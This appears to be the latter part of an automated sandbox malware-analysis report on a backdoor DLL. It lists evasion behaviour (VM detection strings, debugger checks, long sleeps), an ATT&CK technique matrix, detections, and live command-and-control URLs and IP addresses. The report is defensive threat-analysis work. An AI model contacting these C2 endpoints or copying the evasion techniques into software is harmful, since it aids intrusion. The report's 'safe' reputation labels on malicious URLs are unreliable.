          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,0_2_6CEC8107
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-20568
          Source: C:\Windows\System32\loaddll32.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 60000Jump to behavior
          Source: Amcache.hve.6.drBinary or memory string: VMware
          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
          Source: loaddll32.exe, 00000000.00000002.3600686711.000000000104D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo
          Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: rundll32.exe, 00000003.00000003.2063266726.00000000033F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Amcache.hve.6.drBinary or memory string: vmci.sys
          Source: Amcache.hve.6.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.6.drBinary or memory string: VMware20,1
          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\System32\loaddll32.exeAPI call chain: ExitProcess graph end nodegraph_0-20569
          Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED8F6E EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_6CED8F6E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED8F6E EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_6CED8F6E
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEC8107 LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,0_2_6CEC8107
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEB68FD InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,Sleep,EnterCriticalSection,LeaveCriticalSection,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,EnterCriticalSection,LeaveCriticalSection,_malloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,EnterCriticalSection,LeaveCriticalSection,_sprintf,_malloc,_free,0_2_6CEB68FD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED1A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CED1A28
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\cNF6fXdjPw.dll",#1Jump to behavior
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED07BD cpuid 0_2_6CED07BD
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CED47B1 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CED47B1
          Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6CEB68FD InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetTickCount,GetVersionExA,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,_malloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_malloc,_malloc,_malloc,QueryPerformanceCounter,Sleep,_malloc,_malloc,Sleep,Sleep,EnterCriticalSection,LeaveCriticalSection,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,InternetOpenA,InternetSetOptionA,InternetSetOptionA,InternetSetOptionA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,EnterCriticalSection,LeaveCriticalSection,_malloc,EnterCriticalSection,LeaveCriticalSection,_malloc,_strtok,_swscanf,_strtok,_free,Sleep,EnterCriticalSection,LeaveCriticalSection,_sprintf,_malloc,_free,0_2_6CEB68FD
          Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: cNF6fXdjPw.dll, type: SAMPLE
          Source: Yara matchFile source: 0.2.loaddll32.exe.6ceb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7584, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: cNF6fXdjPw.dll, type: SAMPLE
          Source: Yara matchFile source: 0.2.loaddll32.exe.6ceb0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 7584, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Native API
          1
          Bootkit
          11
          Process Injection
          31
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading
          1
          DLL Side-Loading
          11
          Process Injection
          LSASS Memory61
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Ingress Tool Transfer
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
          Obfuscated Files or Information
          NTDS1
          Remote System Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Bootkit
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeylogging112
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Rundll32
          Cached Domain Credentials23
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Software Packing
          DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          DLL Side-Loading
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          cNF6fXdjPw.dll76%ReversingLabsWin32.Backdoor.TeviRat
          cNF6fXdjPw.dll100%AviraHEUR/AGEN.1303070
          cNF6fXdjPw.dll100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://185.237.206.129/0%Avira URL Cloudsafe
          gjeqiox.com0%Avira URL Cloudsafe
          http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e0%Avira URL Cloudsafe
          http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde243530%Avira URL Cloudsafe
          http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb40%Avira URL Cloudsafe
          http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa160%Avira URL Cloudsafe
          http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb40%Avira URL Cloudsafe
          http://eeikzox.ua/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa160%Avira URL Cloudsafe
          http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde243530%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          eeikzox.ua
          94.232.249.187
          truetrue
            unknown
            gjeqiox.com
            185.237.206.129
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              http://eeikzox.ua/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16true
              • Avira URL Cloud: safe
              unknown
              http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4true
              • Avira URL Cloud: safe
              unknown
              http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439e40c87a0c95308147919e3c227a17f5652d73d5c323748588dc365e508ddb06fa16true
              • Avira URL Cloud: safe
              unknown
              http://gjeqiox.com/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842925ce04feea4a21bca13c034078571c0549e823e3c6541a221362694d36a2c9edd9f6c575388d802fb13ced95fb4true
              • Avira URL Cloud: safe
              unknown
              gjeqiox.comtrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://94.232.249.187/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353eloaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://upx.sf.netAmcache.hve.6.drfalse
                high
                http://185.237.206.129/loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62cde24353loaddll32.exe, 00000000.00000002.3600686711.00000000010CC000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://185.237.206.129/fox.php?c=de7ef49b2c006853fb383e293402a01561ac1905c311578eaae3c7edb62dde24353loaddll32.exe, 00000000.00000002.3600686711.00000000010AA000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.3600686711.000000000107C000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                45.155.250.225
                unknownGermany
                34549MEER-ASmeerfarbigGmbHCoKGDEfalse
                94.232.249.187
                eeikzox.uaSyrian Arab Republic
                29256INT-PDN-STE-ASSTEPDNInternalASSYtrue
                185.237.206.129
                gjeqiox.comUkraine
                21100ITLDC-NLUAtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1575251
                Start date and time:2024-12-15 00:46:19 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:11
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:cNF6fXdjPw.dll
                renamed because original name is a hash value
                Original Sample Name:76436512E3E3A9DCA38F5EAF312FE323.dll
                Detection:MAL
                Classification:mal96.troj.evad.winDLL@7/8@7/3
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 99%
                • Number of executed functions: 42
                • Number of non-executed functions: 50
                Cookbook Comments:
                • Found application associated with file extension: .dll
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 52.168.117.173, 40.126.53.19, 52.149.20.212, 13.107.246.63
                • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtQueryValueKey calls found.
                • VT rate limit hit for: cNF6fXdjPw.dll
                No simulations
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                45.155.250.225qn27KP0l9U.exeGet hashmaliciousSocks5SystemzBrowse
                  94.232.249.187KRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                    wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                      AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                        6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                          j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            185.237.206.129Invoice.xlsxGet hashmaliciousFormBookBrowse
                            • 185.237.206.129/jinn.exe
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            ITLDC-NLUAKRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 185.237.206.129
                            wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 185.237.206.129
                            AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 185.237.206.129
                            file.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.174.173.22
                            secure.htmGet hashmaliciousHTMLPhisherBrowse
                            • 217.12.218.219
                            EIqeWlQMGR.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.174.175.187
                            9WqvcxYptm.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.174.173.22
                            sd2.ps1Get hashmaliciousUnknownBrowse
                            • 195.123.217.43
                            Pago_7839389309_8w20w808_723869189.exeGet hashmaliciousAgentTeslaBrowse
                            • 185.174.175.187
                            RRT78-89079090GFVU0-INVRYU-FVIOJ0I.exeGet hashmaliciousMassLogger RATBrowse
                            • 185.174.173.22
                            MEER-ASmeerfarbigGmbHCoKGDEx86_64.elfGet hashmaliciousUnknownBrowse
                            • 45.90.96.167
                            arm.elfGet hashmaliciousUnknownBrowse
                            • 45.90.96.167
                            spc.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            sh4.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            mips.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            ppc.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            arm5.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            arm7.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            arm6.elfGet hashmaliciousMiraiBrowse
                            • 45.90.96.167
                            m68k.elfGet hashmaliciousUnknownBrowse
                            • 45.90.96.167
                            INT-PDN-STE-ASSTEPDNInternalASSYKRdh0OaXqH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 94.232.249.187
                            wG1fFAzGfH.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 94.232.249.187
                            AGcC2uK0El.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 94.232.249.187
                            6hvZpn91O8.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 94.232.249.187
                            j9htknb7BQ.exeGet hashmaliciousPetite Virus, Socks5SystemzBrowse
                            • 94.232.249.187
                            jade.arm.elfGet hashmaliciousMiraiBrowse
                            • 31.9.99.97
                            jade.ppc.elfGet hashmaliciousMiraiBrowse
                            • 95.212.143.36
                            jade.x86.elfGet hashmaliciousMiraiBrowse
                            • 31.14.164.17
                            Josho.ppc.elfGet hashmaliciousUnknownBrowse
                            • 95.212.143.56
                            la.bot.mips.elfGet hashmaliciousMiraiBrowse
                            • 178.171.212.67
                            No context
                            No context
                            Process:C:\Windows\SysWOW64\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):0.9630065285507492
                            Encrypted:false
                            SSDEEP:192:lClMiqOm/w0e7B4LjeT1QzuiF9Z24IO8dci:lfiLWLe7B6jeOzuiF9Y4IO8dci
                            MD5:652A04584DB8E858C258A5D9866F1D2B
                            SHA1:F0FDBED67EF890E561C2CD61C495B4782255C04B
                            SHA-256:87AD85F38D35A347324394872F6A3DEAAB31FE81C7C33F2DA8438FB1BACC484F
